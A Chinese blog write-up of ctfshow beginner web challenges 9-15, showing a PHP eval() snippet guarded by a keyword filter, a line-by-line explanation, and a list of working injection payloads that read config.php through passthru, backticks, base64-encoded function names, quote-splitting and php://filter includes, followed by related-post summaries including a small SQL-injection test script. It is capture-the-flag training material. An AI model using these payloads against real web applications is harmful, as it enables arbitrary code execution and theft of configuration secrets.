【WEB】ctfshow-萌新-web9-15

原创 已于 2024-07-31 15:41:23 修改 · 727 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #CTF #渗透测试

于 2024-07-31 15:39:06 首次发布

文章目录

题目介绍:

ctfshow-萌新计划-web9-15

<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

题目分析:

  1. 包含配置文件

    • include("config.php");
    • 这行代码包含了一个名为config.php的文件,该文件可能包含一些配置信息,比如flag。

  2. 检查GET参数c是否存在

    • if(isset($_GET['c'])){ ... }
    • 这段代码检查是否有通过GET方法提交的c参数。

  3. 获取c参数的值

    • $c = $_GET['c'];
    • 将GET参数c的值赋给变量$c

  4. 正则表达式匹配

    • if(preg_match("/system|exec|highlight/i",$c)){ ... }
    • 使用preg_match函数检查变量$c是否包含systemexechighlight这些字符串(不区分大小写)。这个正则表达式检查的目的是尝试防止某些特定的命令执行函数被调用。

  5. 执行代码

    • eval($c);
    • 如果正则表达式匹配成功,eval函数将执行变量$c中包含的PHP代码。这是一个非常危险的操作,因为它允许执行任意PHP代码,可能导致严重的安全问题。

  6. 错误处理

    • die("cmd error");
    • 如果正则表达式没有匹配,脚本将终止执行并输出错误信息。

  7. 高亮显示当前文件

    • highlight_file(__FILE__);
    • 如果没有提交c参数,脚本将使用highlight_file函数显示当前脚本文件的源代码。

payload:

?c=system('cat config.php');

?c=system('tac config.php');

?c=show_source('config.php');

?c=passthru('tac config.php');

?c=passthru('more config.php');

?c=passthru('more confi***hp');

?c=passthru('tac con\fig*')?>

?c=passthru('c""at con""fig?ph""p')?>

?c=passthru("ca''t `ls`")?>

?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);

?c=$a=opendir('/var/www/html');$e=readdir($a);$e=readdir($a);$e=readdir($a);echo%20readfile($e);

?c= include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php

?c=include $_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php

?a=cat config.php&c=echo`$_REQUEST[a]`;

……

我不会接受我不要的未来,哪怕是命中注定。

ctfshow-WEB-web9( MD5加密漏洞绕过)
wangyuxiang946的博客
09-05 1万+
ctf.show WEB模块第9关是一个SQL注入漏洞, SQL中使用MD5进行加密, 推荐使用MD5加密漏洞绕过 进去以后就是一个登录界面, 盲猜是个SQL注入漏洞 首先, 我们访问根目录下的 robots.txt 文件 robots.txt是一个文本文件,同时也是一个协议,规定了爬虫访问的规则( 哪些文件可以爬取,哪些文件不可以爬取) 从robots.txt文件的内容中可以发现, 作者给了提示, index.phps文件应该就是此关卡的源码文件 接下来...
ctfshow--web9( 利用命令执行漏洞读取网站敏感文件)
热门推荐
wangyuxiang946的博客
09-10 1万+
ctf.show模块 web9关,这一关考察的是命令执行漏洞的利用方式,使用PHP的命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag 页面中展示了部分源码,很明显是作者提示我们利用命令执行漏洞,并提示 flag 就在 config.php 文件中 提交的参数中必须包含 system,exec,highlight其中一个关键字,才能使用 eval()函数执行PHP代码,我们先用 system()执行系统命令,看能否正常使用 ?c=system('ls'...
ctfshow WEB web9
最新发布
weixin_68416970的博客
04-11 360
ctfshow WEB web9
ctfshow------web9
2201_75556700的博客
04-29 678
2、flag就在config.php中,需要以c为变量名传入一个参数,且参数是preg_match中的任意一个。4、接着读取config.php中的内容,并输出到页面中?
ctfshow web 9
trytowritecode的博客
10-20 687
分享一道很有意思的题目 前面好几道题都是sql注入的语句,这边也下意识想着是sql注入,然后测试了很多sql语句发现行不通 就觉得该换个思路 那就扫描下目录吧(我发现dirmap的字典有点拉胯不知道为什么)用dirmap啥都扫不出来于是就换了 dirsearch然后去扫扫出了一个robots.txt 然后就是访问这个地址给你一个下载链接我们直接打开得到 <?php $flag=""; $password=$_POST['password']; if(strlen($pass
ctfshow--web6( 利用二进制绕过获取网站敏感信息)_ctfshowweb6
2401_86044246的博客
08-27 538
模块 web6关,这一关的考点是intval()函数转换字符串的特性,以及SQL注入漏洞的绕过方式,源码中过滤了单双引号,or,加减乘除号,叹号,异或,hex,select等关键字,推荐使用二进制绕过页面中展示了部分源码,并提示我们 id=1000 时,就是flag这里先上答案,payload如下接下来详细解释一下解题的思路,首先是利用intval()函数转换字符串的特性进行绕过。
ctfshow--web14( 曲线救国-POST请求绕过获取网站敏感信息)_ctfweb14
2401_84264244的博客
05-02 757
模块 web14关, 此关卡是一个代码执行漏洞, 重点在于命令执行函数的利用方式, 源码中过滤比较严格, 尤其是过滤了分号;之后, 虽然可以用?>来代替分号, 但这样一来就只能执行一行代码, 难度较大, 需要注意的是, 源码中的过滤只针对GET请求的参数, 而未对POST请求的参数做限制, 这里推荐曲线救国, GET请求传递一句话木马, 然后在POST请求中传递参数执行系统命令, 从而获取 flag来到页面后展示了部分源码, 并提示 flag 就在 config.php文件中。
ctfshow--web12( 利用命令执行函数获取网站敏感信息)
wangyuxiang946的博客
09-11 1万+
ctf.show模块 web12关, 这一关考察的是代码执行漏洞的利用, 重点在于命令执行函数的利用方式, 推荐使用反引号(``) 或者 base64加密绕过 页面中展示了部分源码, 并提示我们 falg 就在 config.php文件中, 读取文件内容即可拿到 flag 首先分析一下源码 重点在这个if判断中, 过滤了参数中的 system exec highlight cat . php config 关键字, 只要绕过这些过滤条件就能使用 eval()函数执行代码...
ctfshow--web10( 利用命令执行漏洞获取网站敏感信息)
wangyuxiang946的博客
09-10 1万+
ctf.show模块 web10关,这一关考察的是命令执行漏洞的利用,闯关者需要知道3个以上PHP命令执行函数的使用,推荐使用passthru() 页面中展示了部分源码,并提示我们 flag 在 config.php 文件中 源码中过滤了 system,exec,highlight 这三个常用的PHP命令执行函数,绕过过滤条件就可以使用 eval() 函数执行PHP代码了,我们使用其他的命令执行函数即可,这里使用passthru()函数即可,先查看一下当前目录 ?...
ctfshow--web14( 曲线救国-POST请求绕过获取网站敏感信息)
wangyuxiang946的博客
09-12 1万+
ctf.show模块 web14关, 此关卡是一个代码执行漏洞, 重点在于命令执行函数的利用方式, 源码中过滤比较严格, 尤其是过滤了分号;之后, 虽然可以用?>来代替分号, 但这样一来就只能执行一行代码, 难度较大, 需要注意的是, 源码中的过滤只针对GET请求的参数, 而未对POST请求的参数做限制, 这里推荐曲线救国,GET请求传递一句话木马, 然后在POST请求中传递参数执行系统命令, 从而获取 flag 来到页面后展示了部分源码, 并提示 flag 就在 config....
CTF show WEB9
羽的博客
02-16 4218
题目地址https://ctf.show 尝试简单的万能密码以及过滤绕过,各种方法均没有回显。 查看网站源代码, 没有提示。 这时候猜测可能有其他页面,直接后台目录扫描,发现index.phps源代码文件。 发现有这么一行 $sql="select * from user where username ='admin' and password ='".md5($password,true)."'...
CTF.show:web9
qq_46230755的博客
01-15 761
打开题目发现有注入框,简单的注入测试后发现没有效果,扫描一下,发现存在robots.txt 进入robots.txt查看文件 下载后打开发现有源代码 <?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("password error"); } $sql="select * from user where username ='admin' and pass
ctfshow-web9
aarong的博客
12-25 2152
如题又是登录框,这次尝试了前面几题方法都没方法做出来,只好换一种思路,先对这网站的后台进行扫描(这里使用了很多种扫描工具比如dirb、dirbbuster都太拉了,扫了个寂寞,最后还是使用了下面这个工具扫出来的) dirsearch扫描网站目录: dirsearch -u http://079eb967-1867-4064-85b7-ee3490881e14.challenge.ctf.show/ 扫描时间比较久,可以打一两把游戏再来看结果。扫描发现网站目录中存在robots.txt 打开robots.
WEB9CTFshow
Sweet_vinegar520的博客
03-03 542
这道题的重点在于中间的判断和正则表达式,意思是只要匹配到system、exec、highlight字符串,就对c变量放入eval执行,现在很明了了,只是用什么命令查询flag的区别。接着尝试cat和find无果后,最终使用了自带的highlight_file('命令');使用system命令,ls将目录展示出来。
CTFSHOW系列-web9(信息收集-swp泄露)
SuperherRo的博客
11-25 721
CTFSHOW系列解题思路
CTFSHOW web入门——web9
m0_74093152的博客
02-05 326
CTFSHOWweb入门——web9
刷题之旅第29站,CTFshow web9
cc菜的一批
02-17 929
感谢ctf show平台提供题目 在robots.txt 发现提示信息。 下载得到了index 文件源码。 <?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("password error"); } $sql="select * from use...
CTF.show:web9
qq_46230755的博客
02-04 727
<?php # flag in config.php include("config.php"); if(isset($_GET['c'])){ $c = $_GET['c']; if(preg_match("/system|exec|highlight/i",$c)){ eval($c); }else{ die("cmd error"); } }else{ high
前路漫漫,写给初级网安工程师的一份指南!
kjuhfkicf154的博客
05-27 497
2023网安入门超全指南
CTFSHOW-web-web4
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "&#39; OR &#39;1&#39;=&#39;1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter &#39;{param}&#39;!") else: print("[-] No SQL Injection found.") ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值